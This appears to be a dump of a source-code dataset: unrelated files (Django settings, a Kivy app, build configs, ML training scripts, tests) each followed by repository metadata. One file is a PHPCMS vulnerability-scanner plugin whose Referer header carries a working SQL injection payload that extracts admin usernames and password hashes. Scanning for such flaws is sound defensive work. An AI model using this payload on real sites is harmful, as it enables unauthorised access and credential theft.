EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
# Truthy only when every AWS credential/setting above is non-empty.
# NOTE(review): `and` chains return the last operand, so USE_S3 ends up a
# string (or ""), not a bool — fine for the `if USE_S3:` guard below.
USE_S3 = (
    AWS_ACCESS_KEY_ID and
    AWS_SECRET_ACCESS_KEY and
    AWS_STORAGE_BUCKET_NAME and
    AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = '/mediafiles/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'mediafiles')
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {
"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")
}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning("You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails.")
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
e924dd9290da87bcf7962e4a2e76cf2fac9d5e8a
|
9e461f40bbdf63d9c00c99f398758f5b236db863
|
/Python/motion_client/main.py
|
017a2466ac1b43da634527a033e525fdbcd3ed5c
|
[] |
no_license
|
robbynickles/portfolio
|
b490a98de9bc7daf6d14b074b2726a06359a8462
|
269b0593ce5e0773fa18f74c4374fcc0bccc5c40
|
refs/heads/master
| 2021-01-10T05:17:00.762021
| 2015-12-25T00:36:23
| 2015-12-25T00:36:23
| 48,555,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,567
|
py
|
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.core.window import Window
w, h = Window.width, Window.height
from libs.swipeplane2 import SwipePlane
from libs.device.device_view import DeviceTest
from libs.client.client_view import Client
from plyer import accelerometer, compass, gyroscope
from plyer.libs.server_utils import shutdown_server_thread
class MobileSensorTest(BoxLayout):
    """Layout holding one DeviceTest widget per hardware sensor."""

    def __init__(self):
        super(MobileSensorTest, self).__init__()
        # Each DeviceTest wraps a plyer sensor facade together with its raw
        # getter (private plyer API — may break across plyer versions).
        self.add_widget( DeviceTest( 'Accel', 'Accelerometer', accelerometer, accelerometer._get_acceleration ) )
        self.add_widget( DeviceTest( 'Compass', 'Compass', compass, compass._get_orientation ) )
        self.add_widget( DeviceTest( 'Gyro', 'Gyroscope', gyroscope, gyroscope._get_orientation ) )

    def input_sources( self ):
        # The sensor widgets themselves serve as input sources for the Client.
        return self.children
class MobileSensorTestApp(App):
    """Two-page swipe UI: sensor readouts on page 1, network client on page 2."""

    def on_pause(self):
        # Returning True lets Android pause the app instead of killing it.
        return True

    def on_resume(self):
        pass

    def on_stop(self):
        # Stop the background server thread before the process exits.
        shutdown_server_thread()

    def build(self):
        swipe_plane = SwipePlane()
        self.mobile_sensor_test = MobileSensorTest()
        page1 = BoxLayout( pos=(0,0), size=(w, h) )
        page1.add_widget( self.mobile_sensor_test )
        swipe_plane.add_page( page1 )
        # Second page sits 1.2 screen-widths right of the first (swipe target).
        page2 = BoxLayout( pos=(1.2*w,0), size=(w, h) )
        page2.add_widget( Client( self.mobile_sensor_test.input_sources(), cols=1 ) )
        swipe_plane.add_page( page2 )
        return swipe_plane
if __name__ == '__main__':
MobileSensorTestApp().run()
|
[
"r.nickles7@gmail.com"
] |
r.nickles7@gmail.com
|
a5dbdb6f26c7bfee74ad32ab213debd273d682df
|
b92c39c8498e0c6579a65430e63b7db927d01aea
|
/python/cookbook/decorator_3.py
|
d19549b43373954c5dcf57ea393088dd0dcf6812
|
[] |
no_license
|
szqh97/test
|
6ac15ad54f6d36e1d0efd50cbef3b622d374bb29
|
ba76c6ad082e2763554bdce3f1b33fea150865dc
|
refs/heads/master
| 2020-04-06T05:40:55.776424
| 2019-01-14T06:37:38
| 2019-01-14T06:37:38
| 14,772,703
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 662
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from functools import wraps, partial
import logging
def logged(func=None, *, level=logging.DEBUG, name=None, message=None):
    """Decorator that emits a log record each time the wrapped function runs.

    Usable bare (``@logged``) or with keyword options
    (``@logged(level=..., name=..., message=...)``). The logger defaults to
    the function's module, the message to the function's name.
    """
    if func is None:
        # Called with options only: return a decorator awaiting the function.
        return partial(logged, level=level, name=name, message=message)

    log = logging.getLogger(name or func.__module__)
    text = message or func.__name__

    @wraps(func)
    def wrapper(*args, **kwargs):
        log.log(level, text)
        return func(*args, **kwargs)

    return wrapper
@logged()
def add(x, y):
    # Example: logged at the default DEBUG level under this module's logger.
    return x + y
@logged(level=logging.CRITICAL, name='example')
def spam():
    # Example: logged at CRITICAL under the 'example' logger.
    print('Spam')
|
[
"szqh97@163.com"
] |
szqh97@163.com
|
1187a68a19b872d637c6b16caef681ea72ae907f
|
ad13583673551857615498b9605d9dcab63bb2c3
|
/output/instances/msData/datatypes/Facets/unsignedByte/unsignedByte_totalDigits003.py
|
95d57599df105ea2f4f13dfa3f01a81276e9e890
|
[
"MIT"
] |
permissive
|
tefra/xsdata-w3c-tests
|
397180205a735b06170aa188f1f39451d2089815
|
081d0908382a0e0b29c8ee9caca6f1c0e36dd6db
|
refs/heads/main
| 2023-08-03T04:25:37.841917
| 2023-07-29T17:10:13
| 2023-07-30T12:11:13
| 239,622,251
| 2
| 0
|
MIT
| 2023-07-25T14:19:04
| 2020-02-10T21:59:47
|
Python
|
UTF-8
|
Python
| false
| false
| 162
|
py
|
from output.models.ms_data.datatypes.facets.unsigned_byte.unsigned_byte_total_digits003_xsd.unsigned_byte_total_digits003 import Test
# W3C XSD conformance sample: an unsignedByte value (123) under a
# totalDigits facet, instantiated via the xsdata-generated model.
obj = Test(
    foo=123
)
|
[
"tsoulloftas@gmail.com"
] |
tsoulloftas@gmail.com
|
64f97e236d713e1627d64ec3e03f6c532a3d2e76
|
0f0af12b45aa6f50fb418f9236fc622e56bbbfee
|
/server/podbaby/history/serializers.py
|
783c7dba88c4eec2024b18765cff0ede0b0e6e8b
|
[] |
no_license
|
danjac/podbaby2
|
234863e5d2ad39902bc64e63e285e7b507049727
|
17f02b0707120797cb3c3cccb95dacddff6375fa
|
refs/heads/master
| 2020-09-24T23:11:08.186829
| 2016-12-03T07:42:59
| 2016-12-03T07:42:59
| 66,766,438
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
from rest_framework import serializers
from history.models import Play
class PlaySerializer(serializers.ModelSerializer):
    """Serializes a Play record, exposing only its 'episode' and 'created' fields."""
    class Meta:
        model = Play
        fields = (
            'episode',
            'created',
        )
|
[
"danjac354@gmail.com"
] |
danjac354@gmail.com
|
fc019e03a0ec2faaedaaf366a1c30c010b4fbc68
|
97fcd33403e69e7e5bb60d27b7de73bb7c58b060
|
/awacs/applicationinsights.py
|
0d90c4b4f0fe2b10f6a8ea40d350fb33b7c02a67
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] |
permissive
|
isabella232/awacs
|
d2b132b527da6b6c2e89da26e9fdbc1d5ca7f191
|
41a131637c16a6912c17f92ac3bbf2a3bf978631
|
refs/heads/master
| 2023-01-09T07:45:22.199974
| 2020-11-16T05:11:01
| 2020-11-16T05:11:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,536
|
py
|
# Copyright (c) 2012-2013, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
from aws import Action as BaseAction
from aws import BaseARN
service_name = 'CloudWatch Application Insights'
prefix = 'applicationinsights'
class Action(BaseAction):
def __init__(self, action=None):
sup = super(Action, self)
sup.__init__(prefix, action)
class ARN(BaseARN):
def __init__(self, resource='', region='', account=''):
sup = super(ARN, self)
sup.__init__(service=prefix, resource=resource, region=region,
account=account)
CreateApplication = Action('CreateApplication')
CreateComponent = Action('CreateComponent')
DeleteApplication = Action('DeleteApplication')
DeleteComponent = Action('DeleteComponent')
DescribeApplication = Action('DescribeApplication')
DescribeComponent = Action('DescribeComponent')
DescribeComponentConfiguration = Action('DescribeComponentConfiguration')
DescribeComponentConfigurationRecommendation = \
Action('DescribeComponentConfigurationRecommendation')
DescribeObservation = Action('DescribeObservation')
DescribeProblem = Action('DescribeProblem')
DescribeProblemObservations = Action('DescribeProblemObservations')
ListApplications = Action('ListApplications')
ListComponents = Action('ListComponents')
ListProblems = Action('ListProblems')
UpdateApplication = Action('UpdateApplication')
UpdateComponent = Action('UpdateComponent')
UpdateComponentConfiguration = Action('UpdateComponentConfiguration')
|
[
"mark@peek.org"
] |
mark@peek.org
|
8df96bdca93c8ac21e2f1bbfaf44925c191e836e
|
e7e497b20442a4220296dea1550091a457df5a38
|
/main_project/release-gyp/user/user_cache.gyp
|
8ad0946152bb7f37f49b7e30cfb8de571639ce27
|
[] |
no_license
|
gunner14/old_rr_code
|
cf17a2dedf8dfcdcf441d49139adaadc770c0eea
|
bb047dc88fa7243ded61d840af0f8bad22d68dee
|
refs/heads/master
| 2021-01-17T18:23:28.154228
| 2013-12-02T23:45:33
| 2013-12-02T23:45:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,361
|
gyp
|
{
#包含公共设置
'includes':[
'user_common.gyp',
],
'variables':{
'service_name' : 'UserCache',
'service_src_path' : '<(main_project_path)/user/<(service_name)/',
},
'target_defaults' : {
'include_dirs' : [
'/usr/local/distcache-dev/include',
'/usr/local/distcache-util/include/',
'/usr/local/distcache/include/',
'<(main_project_path)/tripod-new/src/cpp/include',
'<(main_project_path)/TalkUtil/src',
'<(main_project_path)/third-party/include/',
'<(main_project_path)/third-party/apr/include/apr-1',
'<(main_project_path)/third-party/libactivemq/include/activemq-cpp-3.4.1',
'<(main_project_path)/third-party/redis-c-driver/',
'<(main_project_path)/message_pipe/src/cpp/',
],
'link_settings' : {
'libraries' : [
'-L../third-party/libactivemq/lib',
'-lactivemq-cpp',
#只用xce-dev或third-party的任一个都有问题,
'-L../third-party/apr/lib',
'-L/usr/local/xce-dev/lib64',
'-lapr-1', '-laprutil-1',
'-L/usr/local/distcache-util/lib',
'-lrdc-client',
],
'ldflags': [
'-Wl,-rpath /usr/local/xce-dev/lib64',
'-Wl,-rpath /usr/lib64',
],
},
},
'targets' : [
######################################################
{
'target_name' : 'DistUserCacheReloader',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/dist/reloader -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : '<(service_name)',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/src -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : 'UserCacheAgent',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/agent -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : 'UserCacheReloader',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/reloader -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : 'UserCachePreloader',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/preloader -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : '<(service_name)Test',
'type' : 'executable',
'dependencies' : [
'../gtest.gyp:gtest',
'../gtest.gyp:gtest_main',
'./user_slice_and_adapter.gyp:*'
# '../3rdparty.gyp:hiredis',
# '../base.gyp:base',
# '../xce_base.gyp:xce_base',
#'../tripod2.gyp:tripod_core',
],
'sources' : [
],
},
] #end targets
}
|
[
"liyong19861014@gmail.com"
] |
liyong19861014@gmail.com
|
6d53bd2ad8620c52fba55ab8bda20744ee97b8a0
|
dbe1f4110921a08cb13e22ea325d503bd5627195
|
/chuhuo_2.7_clickhouse/bluedon/bdwafd/newscantools/plugins/Phpcms_post_clickSqlInjectionScript.py
|
1001b1ccc85c453fcecb86d7c9553f38992ae182
|
[] |
no_license
|
Hehouhua/waf_branches
|
92dc1b1cbecba20f24ef6c7372dde7caa43f9158
|
ca76f3a1ed8150b423474c9e37aee37841a5ee35
|
refs/heads/main
| 2023-01-07T11:33:31.667688
| 2020-11-03T06:58:33
| 2020-11-03T06:58:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,626
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from lib.common import *
def run_domain(http,ob):
list = []
try:
domain = ob['domain']
detail = u''
url = "%s://%s%s" % (ob['scheme'],ob['domain'],ob['base_path'])
expurl="%s%s"%(url,"index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2")
data=""
headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain","Referer": "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x4E56535F54455354,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#"}
#res, content = http.request(expurl,"POST",data,headers)
res, content = yx_httplib2_request(http,expurl,"POST",data,headers)
#print content
if content.find('NVS_TEST')>=0:
#print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>"
request = postRequest(expurl,"POST",headers,)
response = getResponse(res)
list.append(getRecord(ob,ob['scheme']+"://"+ob['domain'],ob['level'],detail,request,response))
except Exception,e:
logging.getLogger().error("File:phpcms_post_click.py, run_domain function :" + str(e) + ",task id:" + ob['task_id'] + ",domain id:" + ob['domain_id'])
write_scan_log(ob['task_id'],ob['domain_id'],"File:phpcms_post_click.py, run_domain function :" + str(e))
#end try
return list
#end def
|
[
"hanson_wong@qq.com"
] |
hanson_wong@qq.com
|
cc7c313990a752b0eea8829bbf89e10a65814597
|
06671e14ae54f887be05a64c632712537d38add6
|
/integration_distributed_training/config_files/helios/13_repeat20x031/config_00166.py
|
e23ff123e7c6311a920a8756d990f5e9c1cc62bb
|
[] |
no_license
|
Jessilee/ImportanceSamplingSGD
|
cf74a220a55b468b72fed0538b3a6740f532fcb2
|
0831b9b1833726391a20594d2b2f64f80e1b8fe2
|
refs/heads/master
| 2021-01-24T10:12:48.285641
| 2016-02-05T19:25:34
| 2016-02-05T19:25:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,175
|
py
|
import numpy as np
import os
def get_model_config():
model_config = {}
#Importance sampling or vanilla sgd.
model_config["importance_algorithm"] = "isgd"
#model_config["importance_algorithm"] = "sgd"
#Momentum rate, where 0.0 corresponds to not using momentum
model_config["momentum_rate"] = 0.95
#The learning rate to use on the gradient averaged over a minibatch
model_config["learning_rate"] = 0.01
#config["dataset"] = "mnist"
model_config["dataset"] = "svhn"
#config["dataset"] = "kaldi-i84"
if model_config["dataset"] == "mnist":
print "Error. Missing values of (Ntrain, Nvalid, Ntest)"
quit()
model_config["num_input"] = 784
model_config["num_output"] = 10
elif model_config["dataset"] == "svhn":
(Ntrain, Nvalid, Ntest) = (574168, 30220, 26032)
model_config["num_input"] = 3072
model_config["num_output"] = 10
model_config["normalize_data"] = True
elif model_config["dataset"] == "kaldi-i84":
(Ntrain, Nvalid, Ntest) = (5436921, 389077, 253204)
model_config["num_input"] = 861
model_config["num_output"] = 3472
model_config["normalize_data"] = False
model_config['Ntrain'] = Ntrain
model_config['Nvalid'] = Nvalid
model_config['Ntest'] = Ntest
# Pick one, depending where you run this.
# This could be done differently too by looking at fuelrc
# or at the hostname.
#import socket
#data_root = { "serendib":"/home/dpln/data/data_lisa_data",
# "lambda":"/home/gyomalin/ML/data_lisa_data",
# "szkmbp":"/Users/gyomalin/Documents/fuel_data"}[socket.gethostname().lower()]
data_root = "/rap/jvb-000-aa/data/alaingui"
model_config["mnist_file"] = os.path.join(data_root, "mnist/mnist.pkl.gz")
model_config["svhn_file_train"] = os.path.join(data_root, "svhn/train_32x32.mat")
model_config["svhn_file_extra"] = os.path.join(data_root, "svhn/extra_32x32.mat")
model_config["svhn_file_test"] = os.path.join(data_root, "svhn/test_32x32.mat")
model_config["kaldi-i84_file_train"] = os.path.join(data_root, "kaldi/i84_train.gz")
model_config["kaldi-i84_file_valid"] = os.path.join(data_root, "kaldi/i84_valid.gz")
model_config["kaldi-i84_file_test"] = os.path.join(data_root, "kaldi/i84_test.gz")
model_config["load_svhn_normalization_from_file"] = True
model_config["save_svhn_normalization_to_file"] = False
model_config["svhn_normalization_value_file"] = os.path.join(data_root, "svhn/svhn_normalization_values.pkl")
model_config["hidden_sizes"] = [2048, 2048, 2048, 2048]
# Note from Guillaume : I'm not fond at all of using seeds,
# but here it is used ONLY for the initial partitioning into train/valid.
model_config["seed"] = 9999494
#Weights are initialized to N(0,1) * initial_weight_size
model_config["initial_weight_size"] = 0.01
#Hold this fraction of the instances in the validation dataset
model_config["fraction_validation"] = 0.05
model_config["master_routine"] = ["sync_params"] + ["refresh_importance_weights"] + (["process_minibatch"] * 32)
model_config["worker_routine"] = ["sync_params"] + (["process_minibatch"] * 10)
model_config["turn_off_importance_sampling"] = False
assert model_config['Ntrain'] is not None and 0 < model_config['Ntrain']
assert model_config['Nvalid'] is not None
assert model_config['Ntest'] is not None
return model_config
def get_database_config():
# Try to connect to the database for at least 10 minutes before giving up.
# When setting this to below 1 minute on Helios, the workers would give up
# way to easily. This value also controls how much time the workers will
# be willing to wait for the parameters to be present on the server.
connection_setup_timeout = 10*60
# Pick one, depending where you run this.
# This could be done differently too by looking at fuelrc
# or at the hostname.
#import socket
#experiment_root_dir = { "serendib":"/home/dpln/tmp",
# "lambda":"/home/gyomalin/ML/tmp",
# "szkmbp":"/Users/gyomalin/tmp"}[socket.gethostname().lower()]
experiment_root_dir = "/rap/jvb-000-aa/data/alaingui/experiments_ISGD/00166"
redis_rdb_path_plus_filename = os.path.join(experiment_root_dir, "00166.rdb")
logging_folder = experiment_root_dir
want_rdb_background_save = True
# This is part of a discussion about when we should the master
# start its training with uniform sampling SGD and when it should
# perform importance sampling SGD.
# The default value is set to np.Nan, and right now the criterion
# to decide if a weight is usable is to check if it's not np.Nan.
#
# We can decide to add other options later to include the staleness
# of the importance weights, or other simular criterion, to define
# what constitutes a "usable" value.
default_importance_weight = np.NaN
#default_importance_weight = 1.0
want_master_to_do_USGD_when_ISGD_is_not_possible = True
master_usable_importance_weights_threshold_to_ISGD = 0.1 # cannot be None
# The master will only consider importance weights which were updated this number of seconds ago.
staleness_threshold_seconds = 20
staleness_threshold_num_minibatches_master_processed = None
# Guillaume is not so fond of this approach.
importance_weight_additive_constant = 10.0
serialized_parameters_format ="opaque_string"
# These two values don't have to be the same.
# It might be possible that the master runs on a GPU
# and the workers run on CPUs just to try stuff out.
workers_minibatch_size = 2048
master_minibatch_size = 128
# This is not really being used anywhere.
# We should consider deleting it after making sure that it
# indeed is not being used, but then we could argue that it
# would be a good idea to use that name to automatically determine
# the values of (Ntrain, Nvalid, Ntest).
dataset_name='svhn'
L_measurements=["individual_importance_weight", "individual_gradient_square_norm", "individual_loss", "individual_accuracy", "minibatch_gradient_mean_square_norm"]
L_segments = ["train", "valid", "test"]
#
# The rest of this code is just checks and quantities generated automatically.
#
assert workers_minibatch_size is not None and 0 < workers_minibatch_size
assert master_minibatch_size is not None and 0 < master_minibatch_size
assert dataset_name is not None
assert serialized_parameters_format in ["opaque_string", "ndarray_float32_tostring"]
assert 0.0 <= master_usable_importance_weights_threshold_to_ISGD
assert master_usable_importance_weights_threshold_to_ISGD <= 1.0
return dict(connection_setup_timeout=connection_setup_timeout,
workers_minibatch_size=workers_minibatch_size,
master_minibatch_size=master_minibatch_size,
dataset_name=dataset_name,
L_measurements=L_measurements,
L_segments=L_segments,
want_only_indices_for_master=True,
want_exclude_partial_minibatch=True,
serialized_parameters_format=serialized_parameters_format,
default_importance_weight=default_importance_weight,
want_master_to_do_USGD_when_ISGD_is_not_possible=want_master_to_do_USGD_when_ISGD_is_not_possible,
master_usable_importance_weights_threshold_to_ISGD=master_usable_importance_weights_threshold_to_ISGD,
staleness_threshold_seconds=staleness_threshold_seconds,
staleness_threshold_num_minibatches_master_processed=staleness_threshold_num_minibatches_master_processed,
importance_weight_additive_constant=importance_weight_additive_constant,
logging_folder=logging_folder,
redis_rdb_path_plus_filename=redis_rdb_path_plus_filename,
want_rdb_background_save=want_rdb_background_save)
def get_helios_config():
# Optional.
return {}
|
[
"gyomalin@gmail.com"
] |
gyomalin@gmail.com
|
8c9cac2973d6978608f4768621bb61a098589c65
|
8316b326d035266d41875a72defdf7e958717d0a
|
/Regression/Poly_linear_regression_boston_house_predict.py
|
465a1cccc33d4b05fe7f9a57daa1fb6da7a7de61
|
[] |
no_license
|
MrFiona/MachineLearning
|
617387592b51f38e59de64c090f943ecee48bf1a
|
7cb49b8d86abfda3bd8b4b187ce03faa69e6302d
|
refs/heads/master
| 2021-05-06T17:18:49.864855
| 2018-01-24T15:29:36
| 2018-01-24T15:29:36
| 111,804,323
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,783
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Time : 2017-11-28 15:22
# Author : MrFiona
# File : Poly_linear_regression_boston_house_predict.py
# Software: PyCharm Community Edition
import warnings
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from sklearn import datasets
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.linear_model import LinearRegression, LassoCV, RidgeCV, ElasticNetCV
from sklearn.linear_model.coordinate_descent import ConvergenceWarning
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures, StandardScaler
names = ['CRIM','ZN', 'INDUS','CHAS','NOX','RM','AGE','DIS','RAD','TAX','PTRATIO','B','LSTAT']
def notEmpty(s):
return s != ''
mpl.rcParams[u'font.sans-serif'] = [u'simHei']
mpl.rcParams[u'axes.unicode_minus'] = False
warnings.filterwarnings(action = 'ignore', category=ConvergenceWarning)
np.set_printoptions(linewidth=100, suppress=True)
df = pd.read_csv('../datas/boston_housing.data', header=None)
# print(df.values)
data = np.empty((len(df), 14))
for i, d in enumerate(df.values):
d = list(map(float,list(filter(notEmpty, d[0].split(' ')))))
data[i] = d
x, y = np.split(data, (13,), axis=1)
y = y.ravel()
# print('x:\t', x, type(x))
# print('y:\t', y, type(y))
print ("样本数据量:%d, 特征个数:%d" % x.shape)
print ("target样本数据量:%d" % y.shape[0])
models = [
Pipeline([
('ss', StandardScaler()),
('poly', PolynomialFeatures()),
('linear', RidgeCV(alphas=np.logspace(-3, 1, 20)))
]),
Pipeline([
('ss', StandardScaler()),
('poly', PolynomialFeatures()),
('linear', LassoCV(alphas=np.logspace(-3, 1, 20)))
])
]
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)
parameters = {
"poly__degree": [3,2,1],
"poly__interaction_only": [True, False],
"poly__include_bias": [True, False],
"linear__fit_intercept": [True, False]
}
titles = ['Ridge', 'Lasso']
colors = ['g-', 'b-']
plt.figure(figsize=(16, 8), facecolor='w')
ln_x_test = range(len(x_test))
plt.plot(ln_x_test, y_test, 'r-', lw=2, label=u'真实值')
for t in range(2):
model = GridSearchCV(models[t], param_grid=parameters, n_jobs=1)
model.fit(x_train, y_train)
print("%s算法:最优参数:" % titles[t], model.best_params_)
print("%s算法:R值=%.3f" % (titles[t], model.best_score_))
y_predict = model.predict(x_test)
plt.plot(ln_x_test, y_predict, colors[t], lw=t + 3, label=u'%s算法估计值,$R^2$=%.3f' % (titles[t], model.best_score_))
plt.legend(loc='upper left')
plt.grid(True)
plt.title(u"波士顿房屋价格预测")
plt.show()
|
[
"1160177283@qq.com"
] |
1160177283@qq.com
|
79ae6089ad6be6b58d2ffa5c5819cdeffca5037a
|
5d6a464bcf381a44588d6a0a475f666bdc8b5f05
|
/unittests/namespace_matcher_tester.py
|
a517fd7da3b64b22821666f82bf8e3b8183eb0f0
|
[
"BSL-1.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
iMichka/pygccxml
|
d4f2ac032a742f1cd9c73876f6ba6a85d2047837
|
f872d056f477ed2438cd22b422d60dc924469805
|
refs/heads/develop
| 2023-08-05T04:35:32.774634
| 2017-01-10T06:04:17
| 2017-01-10T06:04:17
| 45,710,813
| 0
| 2
|
BSL-1.0
| 2023-08-20T21:02:24
| 2015-11-06T22:14:37
|
Python
|
UTF-8
|
Python
| false
| false
| 2,084
|
py
|
# Copyright 2014-2017 Insight Software Consortium.
# Copyright 2004-2009 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0.
# See http://www.boost.org/LICENSE_1_0.txt
import unittest
import parser_test_case
from pygccxml import parser
from pygccxml import declarations
class Test(parser_test_case.parser_test_case_t):
COMPILATION_MODE = parser.COMPILATION_MODE.ALL_AT_ONCE
def __init__(self, *args):
parser_test_case.parser_test_case_t.__init__(self, *args)
self.header = 'bit_fields.hpp'
self.declarations = None
def setUp(self):
if not self.declarations:
self.declarations = parser.parse([self.header], self.config)
def test(self):
criteria = declarations.namespace_matcher_t(name='bit_fields')
declarations.matcher.get_single(criteria, self.declarations)
self.assertTrue(
str(criteria) == '(decl type==namespace_t) and (name==bit_fields)')
def test_allow_empty(self):
global_ns = declarations.get_global_namespace(self.declarations)
global_ns.init_optimizer()
self.assertTrue(
0 == len(global_ns.namespaces('does not exist', allow_empty=True)))
class unnamed_ns_tester_t(parser_test_case.parser_test_case_t):
COMPILATION_MODE = parser.COMPILATION_MODE.ALL_AT_ONCE
def __init__(self, *args):
parser_test_case.parser_test_case_t.__init__(self, *args)
self.header = 'unnamed_ns_bug.hpp'
self.declarations = None
def setUp(self):
if not self.declarations:
self.declarations = parser.parse([self.header], self.config)
def test(self):
declarations.matcher.get_single(
declarations.namespace_matcher_t(name='::'), self.declarations)
def create_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(Test))
suite.addTest(unittest.makeSuite(unnamed_ns_tester_t))
return suite
def run_suite():
unittest.TextTestRunner(verbosity=2).run(create_suite())
if __name__ == "__main__":
run_suite()
|
[
"michkapopoff@gmail.com"
] |
michkapopoff@gmail.com
|
b865747d25a963ea30d051c763b151966b68b592
|
667f153e47aec4ea345ea87591bc4f5d305b10bf
|
/Solutions/Ch1Ex032.py
|
146193ba642a281f4a5d647a77ffee5e055d6028
|
[] |
no_license
|
Parshwa-P3/ThePythonWorkbook-Solutions
|
feb498783d05d0b4e5cbc6cd5961dd1e611f5f52
|
5694cb52e9e9eac2ab14b1a3dcb462cff8501393
|
refs/heads/master
| 2022-11-15T20:18:53.427665
| 2020-06-28T21:50:48
| 2020-06-28T21:50:48
| 275,670,813
| 1
| 0
| null | 2020-06-28T21:50:49
| 2020-06-28T21:26:01
|
Python
|
UTF-8
|
Python
| false
| false
| 489
|
py
|
# Ch1Ex032.py
# Author: Parshwa Patil
# ThePythonWorkbook Solutions
# Exercise No. 32
# Title: Sort three numbers
def main():
print("Enter numbers: ")
numbers = list(map(int, input().strip().split()))
for i in range(len(numbers) - 1):
for j in range(1, len(numbers)):
if numbers[j - 1] > numbers[j]:
numbers[j - 1], numbers[j] = numbers[j], numbers[j - 1]
print("Sorted: ")
for n in numbers: print(str(n) + " ", end="")
if __name__ == "__main__": main()
|
[
"noreply@github.com"
] |
Parshwa-P3.noreply@github.com
|
11774cab8ab8b849d8287ce7a299505e8750722b
|
555377aa073d24896d43d6d20d8f9f588d6c36b8
|
/paleomix/common/bamfiles.py
|
4b3c6c6f539923c279d04dea982a2307263c0bee
|
[
"MIT"
] |
permissive
|
jfy133/paleomix
|
0688916c21051bb02b263e983d9b9efbe5af5215
|
f7f687f6f69b2faedd247a1d289d28657710a8c2
|
refs/heads/master
| 2022-11-10T18:37:02.178614
| 2020-06-14T12:24:09
| 2020-06-14T12:24:09
| 270,936,768
| 0
| 0
|
MIT
| 2020-06-09T07:46:19
| 2020-06-09T07:46:18
| null |
UTF-8
|
Python
| false
| false
| 4,837
|
py
|
#!/usr/bin/python
#
# Copyright (c) 2012 Mikkel Schubert <MikkelSch@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
